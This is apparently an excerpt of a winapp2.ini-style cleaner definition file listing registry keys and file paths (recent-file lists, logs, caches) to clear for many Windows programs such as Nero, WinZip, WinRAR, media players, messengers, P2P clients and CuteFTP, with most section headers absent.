RegKey11=HKCU\Software\Nero\Nero 15\Nero Express\Settings|WorkingDir
RegKey12=HKCU\Software\Nero\Nero 15\Nero Express\Settings|BrowserDir
RegKey13=HKCU\Software\Nero\Nero 15\Nero Express\General|OFDLastISODir
RegKey14=HKCU\Software\Nero\Nero 15\Nero Express\General|OFDLastAudioDir
RegKey15=HKCU\Software\Nero\Nero 15\Nero Express\General|OFDLastVideoDVDKey
RegKey16=HKCU\Software\Nero\Nero 15\Nero WaveEditor\Recent File List
RegKey17=HKCU\Software\Nero\Nero 15\Nero CoverDesigner\Recent File List
FileKey2=%AppData%\Nero\Nero 15\Nero Recode\AnalysisData|*.jpg;*.xml
FileKey3=%AppData%\Nero\Nero 15\Nero BackItUp\Cache|*.txt
FileKey4=%AppData%\Nero\Nero 15\Nero Burning ROM|*.log;*Burning*.dmp
FileKey5=%SystemDrive%\Windows\SysWOW64|*-NeroRescueAgent.txt
FileKey6=%AppData%\Nero\Nero 15\Nero3D|Direct3D.log
FileKey7=%AppData%\Nero\Nero 15\Nero Vision|NeroVideoLog.txt
FileKey8=%AppData%\Nero\Nero 15\Nero Welcome|LogFile.txt
FileKey9=%AppData%\Nero\Nero Blu-ray Player|LogFile.txt
FileKey10=%AppData%\Nero\OnlineServices|LoadData.tmp;LoadData_bak.tmp
FileKey11=%AppData%\Nero\ControlCenter|Sync.log
FileKey12=%CommonAppData%\Nero\Nero 11\ACME|ACME.log
FileKey13=%CommonAppData%\Nero\ACME|ACME.log
FileKey1=%AppData%\Nero\Nero 11\Nero Vision|*.log;*.txt
FileKey2=%AppData%\Nero\Nero 11\Nero Vision\Log|*.*
FileKey3=%AppData%\Nero\Nero 11\Nero Vision\NVFACache|*.*
FileKey4=%AppData%\Nero\Nero 11\Nero3D|*.log
FileKey1=%AppData%\Nero\Nero 10\Nero Vision\Log|*.*
FileKey2=%AppData%\Nero\Nero 10\Nero Vision\NVFACache|*.*
FileKey3=%AppData%\Nero\Nero 10\Nero Vision|*.txt
FileKey4=%AppData%\Nero\Nero 10\Nero3D|*.log
FileKey1=%AppData%\Nero\Nero 15\Nero BackItUp\Cache|*.txt
RegKey1=HKCU\Software\Nero\Nero 15\Nero Express\Recent File List
RegKey2=HKCU\Software\Nero\Nero 15\Nero Express\Settings|WorkingDir
RegKey3=HKCU\Software\Nero\Nero 15\Nero Express\Settings|BrowserDir
RegKey4=HKCU\Software\Nero\Nero 15\Nero Express\General|OFDLastISODir
RegKey5=HKCU\Software\Nero\Nero 15\Nero Express\General|OFDLastAudioDir
RegKey6=HKCU\Software\Nero\Nero 15\Nero Express\General|OFDLastVideoDVDKey
RegKey1=HKCU\Software\e-merge\WinAce\2.0\Favorites
RegKey2=HKCU\Software\e-merge\WinAce\2.0\MRU Items
FileKey1=%commonappdata%\Spybot - Search & Destroy\Logs|*.*
FileKey2=%ProgramFiles%\Spybot - Search & Destroy|advdebug.txt
FileKey3=%commonappdata%\Spybot - Search & Destroy|Statistics.ini
FileKey4=%windir%\All Users\Application Data\Spybot - Search & Destroy\Logs|*.*
FileKey5=%windir%\All Users\Application Data\Spybot - Search & Destroy|Statistics.ini
FileKey6=%commonappdata%\Spybot - Search & Destroy\Backups|*.log
DetectFile=%ProgramFiles%\Lavasoft\Ad-Aware SE Personal\Ad-Aware.exe
FileKey1=%ProgramFiles%\Lavasoft\Ad-Aware SE Personal|defs.ref.old
FileKey2=%appdata%\Lavasoft\Ad-Aware\Logs|*.txt
DetectFile=%ProgramFiles%\Lavasoft\Ad-Aware SE Professional\Ad-Aware.exe
FileKey1=%ProgramFiles%\Lavasoft\Ad-Aware SE Professional|defs.ref.old
DetectFile=%ProgramFiles%\Lavasoft\Ad-Aware SE Plus\Ad-Aware.exe
FileKey1=%ProgramFiles%\Lavasoft\Ad-Aware SE Plus|defs.ref.old
DetectFile=%ProgramFiles%\Lavasoft\Ad-Aware\Ad-Aware.exe
Filekey1=%commonappdata%\Lavasoft\Ad-Aware\Logs|*.log
[Webroot SpySweeper]
Detect=HKCU\Software\Webroot\SpySweeper
FileKey1=%ProgramFiles%\Webroot\Spy Sweeper\Temp|*.*
FileKey2=%appdata%\Webroot\Spy Sweeper\Logs|*Log.txt
DetectFile=%ProgramFiles%\Driver Cleaner Pro\DCleaner.exe
FileKey1=%ProgramFiles%\Driver Cleaner Pro\Log|*.log
RegKey1=HKCU\Software\Kazaa\Search
FileKey1=%ProgramFiles%\Netscape\Users\default|netscape.hst;cookies.txt
FileKey2=%ProgramFiles%\Netscape\Users\default\cache|*.*
RegKey1=HKCU\Software\Microsoft\VisualStudio\6.0\FileMRUList
RegKey2=HKCU\Software\Microsoft\VisualStudio\6.0\MenuMRUList
RegKey3=HKCU\Software\Microsoft\VisualStudio\6.0\ProjectMRUList
RegKey4=HKCU\Software\Microsoft\Visual Basic\6.0\RecentFiles
RegKey1=HKCU\Software\Axialis\IconWorkshop\Recent File List
RegKey2=HKCU\Software\Axialis\IconWorkshop\Axialis Recent Files
RegKey3=HKCU\Software\Axialis\IconWorkshop\CoolBarList
FileKey1=%appdata%\Axialis\Temporary Preview Files|*.*|RECURSE
FileKey2=%LocalAppData%\Axialis\Temporary Preview Files|*.*|RECURSE
FileKey1=%ProgramFiles%\eMule\config|AC_SearchStrings.dat
FileKey2=%LocalAppData%\eMule\config|AC_SearchStrings.dat
FileKey3=%CommonAppData%\eMule\config|AC_SearchStrings.dat
FileKey1=%ProgramFiles%\eMule\config|known.met;known2.met;known2_64.met
FileKey2=%LocalAppData%\eMule\config|known.met;known2.met;known2_64.met
FileKey3=%CommonAppData%\eMule\config|known.met;known2.met;known2_64.met
RegKey1=HKLM\Software\WinISO\Reopen
RegKey1=HKCU\Software\Smart Projects\IsoBuster|ImageFilePath
RegKey1=HKCU\Software\Gabest\Media Player Classic\Recent File List
RegKey2=HKCU\Software\Gabest\Media Player Classic\Recent Dub List
RegKey3=HKCU\Software\Gabest\Media Player Classic\Capture|FileName
FileKey1=%appdata%\Media Player Classic|default.mpcpl
RegKey1=HKCU\Software\BST\bsplayer|File0
RegKey2=HKCU\Software\BST\bsplayer|File1
RegKey3=HKCU\Software\BST\bsplayer|File2
RegKey4=HKCU\Software\BST\bsplayer|File3
RegKey5=HKCU\Software\BST\bsplayer|File4
RegKey6=HKCU\Software\BST\bsplayer|File5
RegKey7=HKCU\Software\BST\bsplayer|File6
RegKey8=HKCU\Software\BST\bsplayer|File7
RegKey9=HKCU\Software\BST\bsplayer|File8
RegKey10=HKCU\Software\BST\bsplayer|File9
DetectFile=%ProgramFiles%\videolan\vlc\vlc.exe
FileKey1=%appdata%\vlc\art\artistalbum\|*.*|REMOVESELF
FileKey2=%appdata%\vlc\art\arturl\|*.*|REMOVESELF
[MediaMonkey]
Detect=HKCU\Software\MediaMonkey
DetectFile=%ProgramFiles%\MediaMonkey\MediaMonkey.exe
FileKey1=%localappdata%\MediaMonkey|MediaMonkey.m3u
FileKey2=%localappdata%\MediaMonkey\Previews|*.*|RECURSE
FileKey1=%ProgramFiles%\Winamp\Plugins\ml|recent.dat
FileKey2=%ProgramFiles%\Winamp\Plugins\ml\cache|*.*|RECURSE
FileKey3=%AppData%\Winamp\Plugins\ml|recent.dat
FileKey4=%AppData%\Winamp\Plugins\ml\Cache|*.*|RECURSE
FileKey1=%LocalAppData%\Musicmatch\Jukebox|*.log;*log.txt
FileKey2=%ProgramFiles%\MUSICMATCH\Musicmatch Jukebox\TEMP|*.*
RegKey1=HKCU\Software\Sonic Foundry\Sound Forge\6.0\Metrics|S30110
RegKey2=HKCU\Software\Sonic Foundry\Sound Forge\6.0\Metrics|S30111
RegKey3=HKCU\Software\Sonic Foundry\Sound Forge\6.0\Metrics|S30112
RegKey4=HKCU\Software\Sonic Foundry\Sound Forge\6.0\Metrics|S30113
RegKey5=HKCU\Software\Sonic Foundry\Sound Forge\6.0\Metrics|S30114
RegKey6=HKCU\Software\Sonic Foundry\Sound Forge\6.0\Metrics|S30115
RegKey1=HKCU\Software\Audacity\Audacity\RecentFiles
[Windows Live Messenger]
Detect=HKCU\Software\Microsoft\MSNMessenger\PerPassportSettings
RegKey1=HKCU\Software\Microsoft\MessengerService\ListCache\.NET Messenger Service
FileKey1=%AppData%\Microsoft\MSN Messenger|*.sqm|RECURSE
FileKey2=%LocalAppData%\Microsoft\Messenger|*.uccapilog;*.bak
FileKey3=%UserProfile%\Tracing|WindowsLiveMessenger*.uccapilog;WindowsLiveMessenger*.uccapilog.bak
DetectFile=%ProgramFiles%\Skype\Phone\Skype.exe
FileKey1=%AppData%\Skype|temp*
DetectFile=%ProgramFiles%\AIM\aim.exe
FileKey1=%AppData%\acccore\caches\bart|*.*|RECURSE
FileKey2=%AppData%\acccore\caches\users|*.*|REMOVESELF
FileKey3=%LocalAppData%\AIM\Settings\aolbartcache|*.*|RECURSE
DetectFile2=%AppData%\Camfrog\history.db
FileKey1=%LocalAppData%\CrashRpt|*.*|REMOVESELF
FileKey2=%AppData%\Camfrog\cache|*.*|RECURSE
DetectFile1=%ProgramFiles%\Miranda IM\miranda32.exe
DetectFile2=%ProgramFiles%\Miranda IM\miranda64.exe
FileKey1=%AppData%\Miranda|*.jpg|REMOVESELF
DetectFile=%ProgramFiles%\Pidgin\pidgin.exe
FileKey1=%AppData%\.purple\autoaccept|*.*|REMOVESELF
FileKey2=%AppData%\.purple\icons|*.*
DetectFile=%ProgramFiles%\Yahoo!\Messenger\YahooMessenger.exe
FileKey1=%ProgramFiles%\Yahoo!\Messenger\Cache|*.*|RECURSE
FileKey2=%ProgramFiles%\Yahoo!\Messenger\IMVCache|*.*|RECURSE
FileKey3=%ProgramFiles%\Yahoo!\Messenger|ypager.log
FileKey4=%ProgramFiles%\Yahoo!\Messenger\Logs|*.*
FileKey5=%ProgramFiles%\Yahoo!\Messenger\Games|*.gif|RECURSE
DetectFile=%ProgramFiles%\ooVoo\ooVoo.exe
FileKey1=%AppData%\ooVoo Details\cache|*.*
FileKey2=%AppData%\ooVoo Details\logs|*.*
DetectFile1=%ProgramFiles%\TeamSpeak 3 Client\ts3client_win32.exe
DetectFile2=%ProgramFiles%\TeamSpeak 3 Client\ts3client_win64.exe
FileKey1=%AppData%\TS3Client\cache|*.*|REMOVESELF
FileKey2=%AppData%\TS3Client\Logs|*.*
DetectFile=%ProgramFiles%\Ventrilo\Ventrilo.exe
FileKey1=%AppData%\Ventrilo|ventrilo.log
FileKey2=%AppData%\Ventrilo\temp|*.*
FileKey3=%AppData%\Ventrilo\recordings|*.*
DetectFile=%ProgramFiles%\VentSrv\ventrilo_srv.exe
FileKey1=%ProgramFiles%\VentSrv|ventrilo_srv.log
FileKey1=%AppData%\MySpace\IM\Install|*.*
FileKey2=%AppData%\MySpace\IM\Logs|*.*
FileKey1=%AppData%\Acronis\TrueImage\Logs|*.log
FileKey2=%AppData%\Acronis\TrueImageHome\Logs|*.log
FileKey3=%CommonAppData%\Acronis\TrueImage\Logs|*.log
FileKey4=%CommonAppData%\Acronis\TrueImageHome\Logs|*.log
RegKey1=HKCU\Software\Nico Mak Computing\WinZip\filemenu
RegKey2=HKCU\Software\Nico Mak Computing\WinZip\extract
RegKey3=HKCU\Software\Nico Mak Computing\WinZip\directories|DefDir
RegKey4=HKCU\Software\Nico Mak Computing\WinZip\directories|ExtractTo
RegKey5=HKCU\Software\Nico Mak Computing\WinZip\directories|gzAddDir
RegKey6=HKCU\Software\Nico Mak Computing\WinZip\directories|zDefDir
RegKey7=HKCU\Software\Nico Mak Computing\WinZip\directories|AddDir
RegKey8=HKCU\Software\Nico Mak Computing\WinZip\directories|gzExtractTo
RegKey9=HKCU\Software\Nico Mak Computing\WinZip\rrs\Opened
RegKey10=HKCU\Software\Nico Mak Computing\WinZip\mru\archives|0
RegKey11=HKCU\Software\Nico Mak Computing\WinZip\mru\archives|1
RegKey12=HKCU\Software\Nico Mak Computing\WinZip\mru\archives|2
RegKey13=HKCU\Software\Nico Mak Computing\WinZip\mru\archives|3
RegKey14=HKCU\Software\Nico Mak Computing\WinZip\mru\archives|4
RegKey15=HKCU\Software\Nico Mak Computing\WinZip\mru\archives|5
RegKey16=HKCU\Software\Nico Mak Computing\WinZip\mru\archives|6
RegKey17=HKCU\Software\Nico Mak Computing\WinZip\mru\archives|7
RegKey18=HKCU\Software\Nico Mak Computing\WinZip\mru\archives|8
RegKey19=HKCU\Software\Nico Mak Computing\WinZip\mru\archives|9
RegKey20=HKCU\Software\Nico Mak Computing\WinZip\mru\archives|10
RegKey21=HKCU\Software\Nico Mak Computing\WinZip\mru\archives|11
RegKey22=HKCU\Software\Nico Mak Computing\WinZip\mru\archives|12
RegKey23=HKCU\Software\Nico Mak Computing\WinZip\mru\archives|13
RegKey24=HKCU\Software\Nico Mak Computing\WinZip\mru\archives|14
RegKey25=HKCU\Software\Nico Mak Computing\WinZip\mru\archives|15
RegKey26=HKCU\Software\Nico Mak Computing\WinZip\mru\archives|16
RegKey27=HKCU\Software\Nico Mak Computing\WinZip\mru\archives|17
RegKey28=HKCU\Software\Nico Mak Computing\WinZip\mru\archives|18
RegKey29=HKCU\Software\Nico Mak Computing\WinZip\mru\archives|19
RegKey30=HKCU\Software\Nico Mak Computing\WinZip\mru\archives|20
FileKey1=%AppData%\WinZip\WINZIPSCANNER\Registry Cleaner|log_*.log
FileKey2=%AppData%\WinZip\WINZIPSCANNER\System Cleaner|log_*.log
RegKey1=HKCU\Software\WinRAR\ArcHistory
RegKey2=HKCU\Software\WinRAR\General|LastFolder
RegKey3=HKCU\Software\WinRAR\DialogEditHistory\Arcname
RegKey4=HKCU\Software\WinRAR\DialogEditHistory\ExtrPath
RegKey5=HKCU\Software\WinRAR\DialogEditHistory\FindArcNames
RegKey6=HKCU\Software\WinRAR\DialogEditHistory\FindNames
RegKey7=HKCU\Software\WinRAR\DialogEditHistory\FindText
RegKey8=HKCU\Software\WinRAR\DialogEditHistory\ArcCmtName
RegKey1=HKCU\Software\7-Zip\Compression\ArcHistory
RegKey2=HKCU\Software\7-Zip\Extraction\PathHistory
RegKey3=HKCU\Software\7-Zip\FM|CopyHistory
RegKey4=HKCU\Software\7-Zip\FM|FolderHistory
RegKey5=HKCU\Software\7-Zip\FM|PanelPath0
RegKey6=HKCU\Software\7-Zip\Compression|ArcHistory
RegKey7=HKCU\Software\7-Zip\Extraction|PathHistory
RegKey1=HKCU\Software\Bitberry\BitZipper\Open
RegKey2=HKCU\Software\Bitberry\BitZipper\Preferences|ExtractLastFolder
RegKey3=HKCU\Software\Bitberry\BitZipper\Preferences|AddLastFolder
RegKey4=HKCU\Software\Bitberry\BitZipper\Preferences|NewLastFolder
RegKey5=HKCU\Software\Bitberry\BitZipper\Preferences|OpenLastFolder
RegKey6=HKCU\Software\Bitberry\BitZipper\Preferences\FolderMRU
RegKey7=HKCU\Software\Bitberry\BitZipper\Preferences\FilterMRU
RegKey1=HKCU\Software\PowerArchiver\Files|Active_File1
RegKey2=HKCU\Software\PowerArchiver\Files|Active_File2
RegKey3=HKCU\Software\PowerArchiver\Files|Active_File3
RegKey4=HKCU\Software\PowerArchiver\Files|Active_File4
RegKey5=HKCU\Software\PowerArchiver\Files|Active_File5
RegKey6=HKCU\Software\PowerArchiver\Files|Extract1
RegKey7=HKCU\Software\PowerArchiver\Files|Extract2
RegKey8=HKCU\Software\PowerArchiver\Files|Extract3
RegKey9=HKCU\Software\PowerArchiver\Files|Extract4
RegKey10=HKCU\Software\PowerArchiver\Files|Extract5
RegKey11=HKCU\Software\PowerArchiver\Files|Last open dir
RegKey12=HKCU\Software\PowerArchiver\Files|Last backup dir
RegKey13=HKCU\Software\PowerArchiver\Files|Last add dir
RegKey1=HKCU\Software\PowerArchiverInt\Files|Last open dirW
RegKey2=HKCU\Software\PowerArchiverInt\Files|Last backup dirW
RegKey3=HKCU\Software\PowerArchiverInt\Files|Last add dirW
RegKey4=HKCU\Software\PowerArchiverInt\Files|Active_File1W
RegKey5=HKCU\Software\PowerArchiverInt\Files|Active_File2W
RegKey6=HKCU\Software\PowerArchiverInt\Files|Active_File3W
RegKey7=HKCU\Software\PowerArchiverInt\Files|Active_File4W
RegKey8=HKCU\Software\PowerArchiverInt\Files|Active_File5W
RegKey9=HKCU\Software\PowerArchiverInt\Files|Active_File6W
RegKey10=HKCU\Software\PowerArchiverInt\Files|Active_File7W
RegKey11=HKCU\Software\PowerArchiverInt\Files|Active_File8W
RegKey12=HKCU\Software\PowerArchiverInt\Files|Active_File9W
RegKey13=HKCU\Software\PowerArchiverInt\Files|Active_File10W
RegKey14=HKCU\Software\PowerArchiverInt\Files|Active_File11W
RegKey15=HKCU\Software\PowerArchiverInt\Files|Active_File12W
RegKey16=HKCU\Software\PowerArchiverInt\Files|Active_File13W
RegKey17=HKCU\Software\PowerArchiverInt\Files|Active_File14W
RegKey18=HKCU\Software\PowerArchiverInt\Files|Active_File15W
RegKey19=HKCU\Software\PowerArchiverInt\Files|Extract1W
RegKey20=HKCU\Software\PowerArchiverInt\Files|Extract2W
RegKey21=HKCU\Software\PowerArchiverInt\Files|Extract3W
RegKey22=HKCU\Software\PowerArchiverInt\Files|Extract4W
RegKey23=HKCU\Software\PowerArchiverInt\Files|Extract5W
RegKey24=HKCU\Software\PowerArchiverInt\Files|Extract6W
RegKey25=HKCU\Software\PowerArchiverInt\Files|Extract7W
RegKey26=HKCU\Software\PowerArchiverInt\Files|Extract8W
RegKey27=HKCU\Software\PowerArchiverInt\Files|Extract9W
RegKey28=HKCU\Software\PowerArchiverInt\Files|Extract10W
RegKey29=HKCU\Software\PowerArchiverInt\Files|SelDir1W
RegKey30=HKCU\Software\PowerArchiverInt\Files|SelDir2W
RegKey31=HKCU\Software\PowerArchiverInt\Files|SelDir3W
RegKey32=HKCU\Software\PowerArchiverInt\Files|SelDir4W
RegKey33=HKCU\Software\PowerArchiverInt\Files|SelDir5W
RegKey34=HKCU\Software\PowerArchiverInt\Files|BFile1W
RegKey35=HKCU\Software\PowerArchiverInt\Files|BFile2W
RegKey36=HKCU\Software\PowerArchiverInt\Files|BFile3W
RegKey37=HKCU\Software\PowerArchiverInt\Files|BFile4W
RegKey38=HKCU\Software\PowerArchiverInt\Files|BFile5W
RegKey1=HKCU\Software\Mijenix\ZipMagic\CurrentVersion\Recent
RegKey2=HKCU\Software\Mijenix\ZipMagic\CurrentVersion\Archive Manager\UnZip To
RegKey3=HKCU\Software\Mijenix\ZipMagic\CurrentVersion\UnZip To
RegKey4=HKCU\Software\Mijenix\ZipMagic\CurrentVersion\Zip To
RegKey1=HKCU\Software\PicoZip\MRU Items
RegKey2=HKCU\Software\PicoZip\MRUExtract
RegKey1=HKCU\Software\PKWARE\PKZIP70\History
Detect3=HKLM\SOFTWARE\JavaSoft\Java Web Start
FileKey1=%AppData%\Sun\Java\Deployment\cache|*.*|RECURSE
FileKey2=%AppData%\Sun\Java\Deployment\javaws\cache|*.*|RECURSE
FileKey3=%AppData%\Sun\Java\Deployment\Log|*.*
FileKey4=%AppData%\Sun\Java\Deployment\tmp|*.*|RECURSE
FileKey5=%LocalLowAppData%\Sun\Java\Deployment\cache|*.*|RECURSE
FileKey6=%LocalLowAppData%\Sun\Java\Deployment\Log|*.*
FileKey7=%WinDir%\System32|jupdate*.log
FileKey8=%WinDir%\SysWOW64|jupdate*.log
FileKey9=%AppData%\java\webview|*.*
ExcludeKey1=FILE|%AppData%\java\webview\.lock
RegKey1=HKCU\Software\FreshDevices\FreshDownload\History
[Windows Movie Maker]
FileKey1=%localappdata%\Microsoft\Movie Maker|MEDIATAB0.DAT
RegKey1=HKCU\Software\Helios\TextPad 4\Recent File List
RegKey2=HKCU\Software\Helios\TextPad 4\Recent Strings
RegKey1=HKCU\Software\Freeware\VirtualDub\MRU List
RegKey1=HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\Regedit|LastKey
DetectFile2=%LocalAppData%\Microsoft\Windows\GameExplorer
FileKey1=%LocalAppData%\Microsoft Games|*.xml.bak|RECURSE
FileKey2=%LocalAppData%\Microsoft\Windows\GameExplorer\GameStatistics|*.*|REMOVESELF
FileKey3=%LocalAppData%\Microsoft\GFWLive|*.log|RECURSE
RegKey1=HKCU\Software\Visicom Media\AceHTML 5 Freeware\Last URLs
RegKey2=HKCU\Software\Visicom Media\AceHTML 5 Freeware\Last Projects
RegKey3=HKCU\Software\Visicom Media\AceHTML 5 Freeware\Last Open
RegKey4=HKCU\Software\Visicom Media\AceHTML 5 Freeware\Last Files
RegKey1=HKCU\Software\Alcohol Soft\Alcohol 120%\MountedMRU
RegKey2=HKCU\Software\Alcohol Soft\Alcohol 120%\Basic\Image Finder|Current Dir
RegKey3=HKCU\Software\Alcohol Soft\Alcohol 120%\Options\Burning Wizard|ImageFile
FileKey1=%ProgramFiles%\Alcohol Soft\Alcohol 120|alcohol.log
RegKey1=HKCU\Software\Alcohol Soft\Alcohol 52%\MountedMRU
RegKey2=HKCU\Software\Alcohol Soft\Alcohol 52%\Options\Image Making Wizard|ImageFilePath
RegKey3=HKCU\Software\Alcohol Soft\Alcohol 52%\Options\Image Making Wizard|ImageFileName
RegKey4=HKCU\Software\Alcohol Soft\Alcohol 52%\Basic\Image Finder|Current Dir
RegKey1=HKCU\Software\Cronosoft\LeechGet\History
RegKey1=HKCU\Software\Headlight\GetRight\MRU
RegKey2=HKCU\Software\Headlight\GetRight\TypedURLS
RegKey3=HKCU\Software\Headlight\GetRight\Recent File List
FileKey1=%ProgramFiles%\GetRight|GetRight.hst
DetectFile=%CommonAppData%\Speedbit\DAP
RegKey1=HKLM\SOFTWARE\SpeedBit\Download Accelerator\FileList
RegKey2=HKCU\Software\SpeedBit\Download Accelerator\HistoryCombo
RegKey3=HKCU\Software\SpeedBit\Download Accelerator\ADS\SecondMedia
FileKey1=%ProgramFiles%\DAP\Temp|*.*
FileKey2=%ProgramFiles%\DAP\Ads|*.*
FileKey3=%ProgramFiles%\DAP\Log|*.*
FileKey4=%CommonAppData%\Speedbit\DAP\Log|*.*
FileKey5=%CommonAppData%\Speedbit\DAP\temp|*.tmp
FileKey6=%CommonAppData%\Speedbit\DAP\History|*.dat|RECURSE
DetectFile=%ProgramFiles%\Free Download Manager\fdm.exe
RegKey1=HKCU\Software\FreeDownloadManager.ORG\Free Download Manager\Settings|Find
RegKey2=HKCU\Software\FreeDownloadManager.ORG\Free Download Manager\Settings|History
FileKey1=%AppData%\Free Download Manager|*.bak;dlmgrsi.sav;downloads.his.sav;history.sav;spider.sav
FileKey1=%AppData%\Internet Download Accelerator|history.xml
FileKey2=%AppData%\Internet Download Accelerator\temp|*.hnt;lastnews.*;playflv.html
FileKey3=%AppData%\Internet Download Accelerator\temp\Preview|*.*
FileKey4=%AppData%\Internet Download Accelerator\lists|default.xml
FileKey1=%AppData%\IDM|UrlHistory*.txt;foldresHistory.txt
FileKey2=%AppData%\IDM\DwnlData\*|Log.log
FileKey3=%CommonAppData%\IDM\Cache|*.*
FileKey4=%AppData%\IDM\Grabber\Projects|project*.bak
FileKey1=%AppData%\Orbit|fileinfo.dat;filesave.dat
RegKey1=HKCU\Software\Morpheus\Morpheus\Recent File List
RegKey1=HKCU\Software\ORL\VNCviewer\MRU
RegKey1=HKCU\Software\RealVNC\VNCviewer4\MRU
RegKey1=HKCU\Software\DVD Shrink\DVD Shrink 3.2\Recent Targets
RegKey2=HKCU\Software\DVD Shrink\DVD Shrink 3.2\Recent File List
RegKey3=HKCU\Software\DVD Shrink\DVDSHRINK103\TargetFiles
RegKey4=HKCU\Software\DVD Shrink\DVDSHRINK103\SourceFolders
FileKey1=%localappdata%\TiVo Desktop\Cache|*.*
FileKey1=%ProgramFiles%\CA\eTrust Internet Security Suite\eTrust EZ Antivirus|*.log;*log.txt
FileKey2=%ProgramFiles%\CA\eTrust Internet Security Suite\eTrust EZ Antivirus\ArcTemp|*.tmp
FileKey3=%CommonAppData%\CA\Consumer\AV|*.tmp;*.txt|RECURSE
FileKey4=%CommonAppData%\CA\Consumer\CCube|*.tmp;*.txt|RECURSE
FileKey5=%CommonAppData%\CA\Consumer\ISS\FeedStore|*.txt|RECURSE
FileKey6=%ProgramFiles%\CA\CA Internet Security Suite\CA Anti-Virus\ArcTemp|*.*
FileKey7=%ProgramFiles%\CA\CA Internet Security Suite\CA Anti-Virus\tmp|*.*
FileKey1=%windir%\Internet Logs|ZALog*.*
RegKey1=HKCU\Software\Google\Google Earth Plus\Search
RegKey2=HKCU\Software\Google\Google Earth Pro\Search
FileKey1=%AppData%\Google\GoogleEarth|dbcache.dat
FileKey2=%AppData%\Google\GoogleEarth|dbcache.dat.index
FileKey3=%LocalAppData%\Google\GoogleEarth|dbcache.dat
FileKey4=%localappdata%\Google\GoogleEarth|dbcache.dat.index
FileKey5=%LocalLowAppData%\Google\GoogleEarth|dbcache.dat
FileKey6=%LocalLowAppData%\Google\GoogleEarth|dbcache.dat.index
FileKey7=%LocalLowAppData%\Google\GoogleEarth\webdata|*.*
FileKey8=%LocalLowAppData%\Google\GoogleEarth\unified_cache_leveldb_*|*.*
FileKey1=%commonappdata%\Raxco\PerfectDisk\7.0|PerfectDisk.log
FileKey1=%AppData%\Daemon Tools lite\iconscache|*.*
FileKey2=%AppData%\DAEMON Tools Lite|imagecatalog.xml
FileKey3=%AppData%\DAEMON Tools|imagecatalog.xml
FileKey4=%AppData%\DAEMON Tools Pro|imagecatalog.xml
DetectFile=%AppData%\Azureus\.lock
FileKey1=%AppData%\Azureus\logs|*.*|RECURSE
FileKey2=%AppData%\Azureus\logs\save|*.log
FileKey3=%AppData%\Azureus\tmp|*.*|RECURSE
FileKey4=%AppData%\Azureus|*.bak;*.log
FileKey5=%AppData%\Azureus\active|*.bak
DetectFile=%ProgramFiles%\BitTorrent\BitTorrent.exe
FileKey1=%appdata%\BitTorrent|*.old
DetectFile=%ProgramFiles%\FrostWire\FrostWire.exe
FileKey1=%AppData%\FrostWire|*.cache;*.bak;gnutella.net;checkandupdate.txt
FileKey2=%AppData%\FrostWire\image_cache|*.*|REMOVESELF
DetectFile=%ProgramFiles%\uTorrent\uTorrent.exe
FileKey1=%ProgramFiles%\uTorrent|*.dmp
FileKey2=%AppData%\utorrent|*.old
FileKey3=%AppData%\utorrent\dlimagecache|*.*|RECURSE
FileKey4=%AppData%\uTorrent\ie|*.tmp
FileKey5=%LocalLowAppData%\uTorrentBar\CacheIcons|*.*
DetectFile=%ProgramFiles%\Shareaza Applications\Shareaza\Shareaza.exe
FileKey1=%LocalAppData%\Shareaza\Temp|*.*
FileKey2=%LocalAppData%\Shareaza|shistory.im
FileKey3=%LocalAppData%\Shareaza\Artwork|*.*
DetectFile=%ProgramFiles%\iMesh Applications\iMesh\iMesh.exe
FileKey1=%LocalAppData%\iMesh\Temp|*.*
FileKey2=%LocalAppData%\iMesh|shistory.im
FileKey3=%LocalAppData%\iMesh\Artwork|*.*
DetectFile=%ProgramFiles%\BearShare Applications\BearShare\BearShare.exe
FileKey1=%LocalAppData%\BearShare\Temp|*.*
FileKey2=%LocalAppData%\BearShare|shistory.im
FileKey3=%LocalAppData%\BearShare\Artwork|*.*
DetectFile=%ProgramFiles%\DC  \DCPlusPlus.exe
FileKey1=%ProgramFiles%\DC  |files.xml.bz2
FileKey2=%ProgramFiles%\DC  \FileLists|*.*
FileKey3=%ProgramFiles%\DC  \Logs|*.*
FileKey4=%LocalAppData%\DC  |files.xml.bz2
FileKey5=%LocalAppData%\DC  \FileLists|*.*
FileKey6=%LocalAppData%\DC  \Logs|*.*
DetectFile=%ProgramFiles%\Ares\Ares.exe
Regkey1=HKCU\Software\Ares\Search.History
[CuteFTP Pro 7.0]
Detect=HKLM\SOFTWARE\GlobalSCAPE\CuteFTP 7 Professional
FileKey1=%localappdata%\GlobalSCAPE\CuteFTP Pro\7.0\Cache|*.*|RECURSE
FileKey2=%localappdata%\GlobalSCAPE\CuteFTP Pro\7.0\CacheThumbs|*.*|RECURSE
[CuteFTP Home 7.0]
Detect=HKLM\SOFTWARE\GlobalSCAPE\CuteFTP 7 Home
FileKey1=%localappdata%\GlobalSCAPE\CuteFTP\7.0\Cache|*.*|RECURSE
FileKey2=%localappdata%\GlobalSCAPE\CuteFTP\7.0\CacheThumbs|*.*|RECURSE
[CuteFTP Pro 8.0]
Detect=HKLM\SOFTWARE\GlobalSCAPE\CuteFTP 8 Professional
FileKey1=%localappdata%\GlobalSCAPE\CuteFTP Pro\8.0\Cache|*.*|RECURSE
FileKey2=%localappdata%\GlobalSCAPE\CuteFTP Pro\8.0\CacheThumbs|*.*|RECURSE
[CuteFTP Home 8.0]
Detect=HKLM\SOFTWARE\GlobalSCAPE\CuteFTP 8 Home
RegKey1=HKCU\Software\GlobalSCAPE\CuteFTP 8 Home\Recent|LastSiteID
FileKey1=%localappdata%\GlobalSCAPE\CuteFTP Home\8.0\Cache|*.*|RECURSE
FileKey2=%localappdata%\GlobalSCAPE\CuteFTP Home\8.0\CacheThumbs|*.*|RECURSE
FileKey3=%AppData%\GlobalSCAPE\CuteFTP Home\8.0|*.log|RECURSE
[CuteFTP 9]
Detect=HKU\.DEFAULT\Software\Globalscape\CuteFTP 9
Detect2=HKLM\SOFTWARE\Wow6432Node\Globalscape\CuteFTP 9
RegKey1=HKCU\Software\Globalscape\CuteFTP 9\Recent|LastSiteID
FileKey1=%LocalAppData%\Globalscape\CuteFTP\9.0\Cache|*.*
FileKey2=%LocalAppData%\Globalscape\CuteFTP\9.0\CacheThumbs|*.*
FileKey3=%AppData%\Globalscape\CuteFTP\9.0\Logs|*-*_*.log
FileKey4=%CommonAppData%\Globalscape\CuteFTP 9|TRB_BACKUP.dat;TR_BACKUP.dat
[Core FTP]
Detect=HKCU\Software\FTPWare
FileKey1=%AppData%\CoreFTP|*.dir
